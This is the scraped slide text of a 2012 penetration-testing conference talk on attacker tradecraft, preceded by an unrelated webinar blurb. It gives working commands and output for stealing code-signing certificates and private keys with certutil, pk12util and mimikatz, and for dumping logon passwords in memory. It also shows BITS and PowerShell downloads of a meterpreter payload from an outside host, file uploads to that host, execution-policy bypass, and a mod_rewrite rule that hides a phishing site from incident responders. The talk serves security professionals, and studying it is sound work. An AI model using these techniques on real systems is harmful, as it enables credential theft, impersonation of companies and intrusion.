• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
1.
2. Whoami
• Rob Fuller (mubix)
– Twitter -> mubix
– Blog -> http://www.room362.com
– NoVA Hackers
• Previous Talks
– Dirty Little Secrets
– Networking for Penetration Testers
– Metasploit Framework/Pro Training for Rapid7
– Deep Magic 101
– Couch to Career in 80 hours
3. Whoami
• Chris Gates (CG)
– Twitter carnal0wnage
– Blog carnal0wnage.attackresearch.com
– Job Partner/Principal Security Consultant at Lares
– NoVAHackers
• Previous Talks
– ColdFusion for Pentesters
– From LOW to PWNED
– Dirty Little Secrets
– Attacking Oracle (via web)
– wXf Web eXploitation Framework
– Open Source Information Gathering
– Attacking Oracle (via TNS)
– Client-Side Attacks
4. Infoz
• No philosophical stuff this time
– Just digging in and showing neat shit we’ve been
doing since last year
– Last year’s stuff still applies although was told we
were “preaching to the choir”…who still doesn’t
do it…maybe on Sundays…
– Anway…
5. Agenda
• Putting in the hours on LinkedIn for SE
• Giving IR teams a run for their money
• Stealing certs
• Mimikatz with Metasploit
• New Incognito && Netview release
• Ditto
• 10 ways to PSEXEC
• Why doesn’t SYSTEM have proxy settings!?!
• Windows is my backdoor (bitsadmin, powershell, wmi )
• WebDAV server via metasploit
• Turning your External Pentest into an Internal one
• Overview of current DNS Payload options (if time)
6. The setup…
We like to use LinkedIn for OSINT but
how can we do it better?
7. Becoming a LiON
• Why?
• API is based on YOUR
connections
• 2nd and 3rd level connections
count but are give different
access
• Creating a fake account
• Connecting with Recruiters ++
• Connecting with “Open
Networkers”
8. LinkedIn API
• URL:
https://developer.linkedin.com
• Allows you to query
information
– Company info
– Groups
– Name about your 1st &
2nd order connections
9. Big Ass LinkedIn Network
• Meet “John”
• John has been busy being awesome on LinkedIn
for the last few months
11. LinkedIn API
• Limited by YOUR connections and network
reach
• API gives you NO info about 3rd order
connections
• Usually you’ll see more info via the web on 3rd
order people
• The total number of search results possible for
any search will vary depending on the
user's account level.
22. Phishing and F**king with IR Teams
• Thanks to people like SANS organizations have
a standardized, repeatable, process
– What’s not to like?
– Submit to the sandbox
– Submit to the malware lookup site
– I feel safe!
• But, sure does suck when you spend all that
time setting up a phish only to have it ruined
by this well tuned, standardized process…
23. Phishing and F**king with IR Teams
• What you *could* do…
– Build a phish that EVERYONE will report
– Capture the IR process via log/scan/analyst activity
• This gives you intel on:
– Which services are contracted out for analysis
• And their IPs
– Are humans in the mix
• And their IPs
– Level of sophistication
24. Phishing and F**king with IR Teams
• Once you know who’s coming to do analysis,
we can send them to an alternate site and
keep the users going to the phish site.
• How?
25. Phishing and F**king with IR Teams
• Apache and mod-rewrite is an option
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT}
^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT}
^.*(HTTrack|clshttp|archiver|load
er|email|nikto|miner|python|wget|Wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|libwww-
perl|curl|libcurl|harvest|scan|grab|extract).* [NC,OR]
RewriteCond %{REMOTE_ADDR} ^188.168.16.164$ [OR] #outside
IR
RewriteCond %{REMOTE_ADDR} ^66.249.73.136$ [OR]
#googlebot
RewriteCond %{REMOTE_ADDR} ^88.88. [OR]
RewriteRule ^(/.*) http://www.totallysafesite.com/$1
[R,L]
26. The setup…
I want to find and steal code signing
certificates from victims
27. Stealing Certificates
• Why?
• Have you tried to get/buy one? It’s a pain in
the ass.
– I see why people just steal them
• Impact
– Sign code as the company
– Now your code may be *more* trusted by the
victim…or at least less suspicious
– Can you steal their wildcard SSL cert?
28. Stealing Certificates
• If you export one, it has to have a password
• However, if YOU export it, YOU can set the
password.
• You can do this all on the command line
– Use mozilla’s certutil
• http://www.mozilla.org/projects/security/pki/nss/tools
/certutil.html
– Use Mimikatz
29. Stealing Certificates
• Mozilla certutil
• Compile your own, or download precompiled bins
certutil.exe -L -d
C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.def
ault-1339854577637
VeriSign Class 3 Extended Validation SSL CA ,,
DigiCert High Assurance CA-3 ,,
VeriSign Class 3 International Server CA - G3 ,,
COMODO Extended Validation Secure Server CA 2 ,,
Verified Publisher LLC's COMODO CA Limited ID
u,u,u <------- code signer
Akamai Subordinate CA 3 ,,
VeriSign, Inc. ,,
--snip--
30. Stealing Certificates
• Mozilla certutil
• -L List all the certificates, or display information about a named certificate, in a
certificate database.
certutil.exe -L -d
C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdhwru.defaul
t-1339854577637
VeriSign Class 3 Extended Validation SSL CA ,,
DigiCert High Assurance CA-3 ,,
VeriSign Class 3 International Server CA - G3 ,,
COMODO Extended Validation Secure Server CA 2 ,,
Verified Publisher LLC's COMODO CA Limited ID u,u,u
Akamai Subordinate CA 3 ,,
VeriSign, Inc. ,,
--snip
• “u” Certificate can be used for authentication or signing
• http://www.mozilla.org/projects/security/pki/nss/tools/certutil.html
31. Stealing Certificates
• Mozilla pk12util.exe
• To extract the cert:
C:UsersCGDownloadsnss-3.10nss-3.10bin>pk12util.exe -
n "Verified Publisher LLC's COMODO CA Limited ID" -d
C:UsersCGAppDataRoamingMozillaFirefoxProfiles6smdh
wru.default-1339854577637 -o test2.p12 -W mypassword1
• http://www.mozilla.org/projects/security/pki/nss/tools/pk12util.html
32. Stealing Certificates
Via MimiKatz (list certs)
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates
CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit‘
Process 3472 created.
Channel 12 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My
- sqlapps01
Container Clé : SELFSSL
Provider : Microsoft RSA SChannel Cryptographic Provider
Type : AT_KEYEXCHANGE
Exportabilité : OUI
Taille clé : 1024
mimikatz(commandline) # exit
33. Stealing Certificates
Via MimiKatz (export certs)
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates
CERT_SYSTEM_STORE_LOCAL_MACHINE" exit'
Process 6112 created.
Channel 23 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'My
- sqlapps01
Container Clé : SELFSSL
Provider : Microsoft RSA SChannel Cryptographic Provider
Type : AT_KEYEXCHANGE
Exportabilité : OUI
Taille clé : 1024
Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.pfx' : OK
Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.der' : OK
mimikatz(commandline) # exit
34. The setup…
Mimikatz is awesome and I want to
execute it without putting bins on the box
37. Mimikatz
• Mimikatz detected by AV
• Sekurlsa.dll detected by AV
• WCE detected by AV
• WCE IN MEMORY! (kinda)
Stop submitting $#!+ to Virus Total!
38. Mimikatz
• New version (6 Sep 12) supports in-memory
• execute -H -i -c -m -d calc.exe -f mimikatz.exe -a
'"sekurlsa::logonPasswords full" exit'
43. New Incognito (find_token)
C:>find_token.exe dc1
[*] Scanning for logged on users...
Server Name Username
------------------------------------------------------
dc1 PROJECTMENTORjdoe
dc1 PROJECTMENTORjdoe
45. Release of NETVIEW
C:Documents and SettingsuserDesktop>netview
Netviewer Help
--------------------------------------------------------------------
-d domain : Specifies a domain to pull a list of hosts from
uses current domain if none specified
-f filename.txt : Speficies a file to pull a list of hosts from
-o filename.txt : Out to file instead of STDOUT
46. Release of NETVIEW
C:Documents and SettingsuserDesktop>netview -d
[+] Host: WIN7X64
[*] -d used without domain specifed - using current domain
[+] Number of hosts: 3
Enumerating AD Info
[+] WIN7X64 - Comment -
[+] Host: DC1 [+] WIN7X64 - OS Version - 6.1
Enumerating AD Info Enumerating IP Info
[+] DC1 - Comment -
[+] WIN7X64 - IPv4 Address - 172.16.10.216
[+] DC1 - OS Version - 6.1
[+] DC1 - Domain Controller
Enumerating Share Info
Enumerating IP Info [+] WIN7X64 - Share - ADMIN$ Remote Admin
[+] DC1 - IPv4 Address - 172.16.10.10 [+] WIN7X64 - Share - C$ Default share
[+] WIN7X64 - Share - IPC$ Remote IPC
Enumerating Share Info
[+] DC1 - Share - ADMIN$ Remote Admin
[+] DC1 - Share - C$ Default share Enumerating Session Info
[+] DC1 - Share - IPC$ Remote IPC [+] WIN7X64 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0
[+] DC1 - Share - NETLOGON Logon server share
[+] DC1 - Share - SYSVOL Logon server share Enumerating Logged-on Users
Enumerating Session Info
[+] DC1 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0
Enumerating Logged-on Users
[+] DC1 - Logged-on - PROJECTMENTORjdoe
[+] DC1 - Logged-on - PROJECTMENTORjdoe
48. The setup…
Dropping binaries is a necessity sometimes,
persistence for instance, but unless you
name your bin SVCHOST.exe you don’t want
it looking like:
56. Sysinternal PSEXEC
POSITIVES NEGATIVES
• Never going to be on • Need a Password
any AV list • Leaves PSEXESVC
• Executes binary as user running
specified, not as • Have to touch disk if not
SYSTEM, so no Proxy present already
concerns
57. Metasploit PSEXEC
POSITIVES NEGATIVES
• Supports the use of • Some AVs flag service
Hashes binary due to injection
techniques used within
• Rundll32.exe is running
58. Metasploit PSEXEC-MOF
POSITIVES NEGATIVES
• Drop a file and • XP and below
Windows automatically – (only because Metasploit
runs it. (MAGIC!) doesn’t automatically
compile MOFs)
• ADMIN$ required
– (Unless you make code edits)
59. Metasploit PSEXEC-As-User
POSITIVES NEGATIVES
• Executes as the current • Some AVs flag service
user binary due to injection
• No need for passwords techniques used within
or hashes • Rundll32.exe is running
• Also a great way to
bypass UAC.. But more
on that later
60. WMI
POSITIVES NEGATIVES
• Never going to be on • Need a Password
any AV list
• Executes binary as user
specified, not as
SYSTEM, so no Proxy
concerns
61. Powershell
POSITIVES NEGATIVES
• Never going to be on • Need a Password
any AV list
• Executes binary as user
specified, not as
SYSTEM, so no Proxy
concerns
62. RemCom
POSITIVES NEGATIVES
• Open source psexec • Binary, so again, can’t
• You can add Pass-The- go over Metasploit
Hash sessions directly
– (open source an all) – portfwd Fu can still be
used on a single IP
• Runs as SYSTEM
63. Winexe
POSITIVES NEGATIVES
• Open source psexec • Binary, so again, can’t
• Supports Pass-The-Hash go over Metasploit
sessions directly
– portfwd Fu can still be
used on a single IP
• Runs as SYSTEM
64. smbexec
POSITIVES NEGATIVES
• Open source psexec • Binary
• Supports Pass-The-Hash – (but designed with
shoveling over
Metasploit in mind)
http://sourceforge.net/projects/smbexec/
65. Pass the hash for 15 years stuff here
• Firefox
• smbclient
• smbmount
• Rpcclient
• http://passing-the-hash.blogspot.com/
66. Zfasel’s stuff here
• If it ever gets released works ;-)
LOVE YOU FASEL!!
Go see his talk, it works now…
maybe…
67. Python && impacket
• http://code.google.com/p/impacket/
• PTH support for SMB/MSSQL/
68. WinRM (‘new’ hotness)
POSITIVES NEGATIVES
• Never going to be on • Need a Password
any AV list
• Executes binary as user
specified, not as
SYSTEM, so no Proxy
concerns
69. Do you look for 5985 internally on your pen tests?
we would suggest it ;-)
src: http://3.bp.blogspot.com/_nldKmk1qZaA/S2ahpNBS1BI/AAAAAAAAAy8/XrOxvP8B93M/s1600/winrm6.png
70. Victim: winrm quickconfig –q
Attacker:
winrm quickconfig -q
winrm set winrm/config/client @{AllowUnencrypted=“true”;TrustedHosts=“192.168.1.101”}
Yes.. That’s right, THE ATTACKER says which hosts to trust…
Sooooo much fun to be had!
Oh, and did I mention it’s completely interactive? (You
can enter password questions)
71. Metasploit PSEXEC-WinRM
POSITIVES NEGATIVES
• Never going to be on • Need a Password
any AV list
• Executes binary as user
specified, not as
SYSTEM, so no Proxy
concerns
DISCLAIMER: CURRENTLY VAPORWARE!!
but…
72. Build your own pyBear
• PySMB supports auth with using hashes
• Thanks Rel1k for the heads up on the library – but
I’m not a good enough coder to get it working
• Compile your own psexec with hash support
• ;-)
• Impacket (again)
73. Build your own Bear.rb
• Metasploit’s Rex library
– already has the hash passing goodness
– HDM committed a stand-alone version of PSEXEC
on September 5th 2012
78. • If OS !> Vista
– SMB/UPLOAD_FILE BITSADMIN 2.0 (32bit)
• WINDOWS/EXEC (or any of the other psexec
methods we just talked about)
– BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM
AUTOSCRIPT http://wpad/wpad.dat “;” (or PAC)
– BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM
/MANUAL_PROXY 192.168.5.100:3128 “;”
– After your done use NO_PROXY in place of
AUTOSCRIPT or MANUAL_PROXY
• Then MSF-PSEXEC to your heart’s content,
SYSTEM will now use the proxy you’ve set.
79. NETSH & ProxyCFG
• Sets the WinHTTP proxy
– Not Windows’ proxy settings, only is used if the
program uses WinHTTP
• XP
– proxycfg –p 192.168.92.100:3128
– or
– proxycfg –u (pulls it from IE)
• Vista+
– netsh winhttp set proxy 192.168.92.100:3128
– or
– netsh winhttp import proxy ie
81. The setup…
Neat binaries that do backdoor/RAT
behavior that are already there for us.
82. Windows is my backdoor
BITS
“BITS is a file transfer service that provides a
scriptable interface through Windows PowerShell.
BITS transfers files asynchronously in
the foreground or in the background. And, it
automatically resumes file transfers after network
disconnections and after a computer is restarted.”
http://technet.microsoft.com/en-us/library/dd819415.aspx
83. Windows is my backdoor
BITS
There are three types of BITS transfer jobs:
- A download job downloads files to the client
computer.
- An upload job uploads a file to the server.
- An upload-reply job uploads a file to the server and
receives a reply file from the server application.
84. Windows is my backdoor
BITS (How-To)
• Set the server side up (HTTP, not standard setup)
– Google
• Uses powershell to upload/download
import BITS
PS C:Userscg>Import-Module BitsTransfer
Download files over BITS
PS C:Userscg> Start-BitsTransfer
http://192.168.26.128/upload/meterp443.exe
C:UserscgDesktopmeterpdownload443.exe
85. Windows is my backdoor
BITS (How-To)
Upload files over BITS
PS C:Userscg> Start-BitsTransfer -Source
C:UserscgDesktopfile2upload.txt
-Destination
http://192.168.26.128/upload/myfile.txt
-transfertype upload
89. Windows is my backdoor
• PowerShell
– Does A LOT!
– Check out Exploit Monday
and PowerSploit
– Carlos Perez has had lots of
PowerShell blog posts
– I haven't found a
meterpreter feature that
cant be done with
PowerShell
90. Windows is my backdoor
• Powershell cool examples
– Powershell hashdump (in SET)
– Poweshell exec method in MSSQL_Payload
– PowerSploit (syringe dll inject/shellcode exec ala
PowerShell)
91. Windows is my backdoor
• Powershell cool examples
• Port Scanner:
PS C:> 1..1024 | % {
echo
((new-object Net.Sockets.TcpClient)
.Connect("10.1.1.14",$_)) "$_ is open"
} 2>$null
25 is open
• From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
92. Windows is my backdoor
• Powershell cool examples
• Port Sweeper
PS C:> 1..255 | % {
echo
((new-object Net.Sockets.TcpClient)
.Connect("10.1.1.$_",445)) "10.1.1.$_" }
2>$null
10.1.1.5
• From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
93. Windows is my backdoor
• Powershell cool examples
• Bypass execution policy
– Dave Kennedy talked about this at defcon 18
– Requires PowerShell v2.0 or above
– powershell.exe -ExecutionPolicy
Bypass -NoLogo -NonInteractive -
NoProfile -WindowStyle Hidden -
File "C:do_neat_ps_shit.ps1"
94. Windows is my backdoor
• CreateCMD stuff from Dave Kennedy
• In SET
• Pshexec by Carlos Perez
• https://github.com/darkoperator/Meterpreter-Scripts/blob/master/scripts/meterpreter/pshexec.rb
• B64 encodes the command so you can pass
via meterp or in another script
• powershell -noexit –EncodedCommand
[b64enc BLOB]
95. Windows is my backdoor
• Metasploit to generate PowerShell
• Uses old powersploit technique
96. Windows is my backdoor
• How to run PowerShell from Meterpreter
– Use a bat file
C:>type run_ps.bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -
NoProfile -WindowStyle Hidden -File C:ipinfo2.ps1
Example:
meterpreter > execute -H -f cmd.exe -a '/c C:runps.bat'
Process 28536 created.
meterpreter >
[*] 4.5.6.21:3863 Request received for /vLNL...
[*] 4.5.6.21:3863 Staging connection for target /vLNL
received...
--snip--
[*] Patched Communication Timeout at offset 653608...
[*] Meterpreter session 9 opened (1.2.3.205:443 ->
4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
99. MSF WebDAV server
• net use ipdocuments /User:Guest
• copy ipdocumentsmyexe.exe myexe.exe
• Available on github:
• https://github.com/carnal0wnage/Metasploit-
Code/blob/master/modules/exploits/webdav_file_server.rb
101. The Setup…
LAN based attacks are instant wins on
internal pentests, but difficult if not
impossible to do on externals… or are
they…
102. While we are on the subject…
Does anyone know what happens when you try
to access a share on a windows box that doesn’t
exist from another windows box??
I want to access
SHARE3
I don’t have
SHARE3
Is that it?
103. nope
(if webclient service is started – Vista+ manual start)
I want to access SHARE3
I don’t have SHARE3 on SMB
I want to access SHARE3 over WebDAV
If you are following along at home, windows is always (unless disabled) listening on
Port 445 (SMB) so an attacker can’t override it, but rarely have anything listening on port 80
105. Meet the Microsoft Windows Firewall
“PORTPROXY” feature
Basically it’s port-forwarding but can do so for: IPv4 -> IPv4
IPv6 -> IPv4
IPv6 -> IPv6
IPv4 -> IPv6
In XP, if you set up a PORTPROXY, it doesn’t show up in “NETSTAT” or TCPview ;-)
108. why
1. Give me SHARE3!
5. OK, you are in my Intranet, AUTHAUTH
4. AUTH! via portpoxy
3. AUTH!
And yes, SMB_Relay works 7. kthxbai!
just fine if you have a route
set up over your
2. Portproxy!
meterpreter shell of the
6. AUTOAUTH!
connect back. Oh, did I
mention cross-protocol
means you can go to
the same host?! ;-)
110. The setup…
Are DNS Payloads useful? Let’s talk about
our public options
111. DNS Payloads
• Quick talk on currently available DNS payloads
• What’s available?
– CANVAS DNS Mosdef
– DNS Cat (skull security)
– Metasploit DNS Payloads
112. DNS Payloads
• Canvas DNS Mosdef
– Uses DNS TXT Records
• So its UDP and correctly formed?
– BUT
• Directly connects to the host
• Uses TXT records,
– I’ve never pentested someone *good* that allowed this
114. DNS Payloads
• DNSCat (Skullsecurity)
– http://www.skullsecurity.org/wiki/index.php/Dnscat
– Uses recursive DNS requests
• So its UDP and correctly formed?
– Has a metasploit payload, so can make a msf
dnscat binary to run and get shell
– Same as dnscat –d domain –exec “cmd.exe”
– BUT
• But does recursive DNS requests
• Never worked for me IRL
118. DNS Payloads
• Metasploit DNS
– Currently there are no full DNS payloads
• Aside from skullsecurity dnscat payload (not in trunk)
– There are several payloads that will got fetch
ANOTHER payload and exec it for you via DNS
• dns_txt_query_exec.rb
• dns_query_exec.rb
• https://github.com/rapid7/metasploit-
framework/pull/173
– Something in the works:
http://dev.metasploit.com/redmine/issues/444#note-9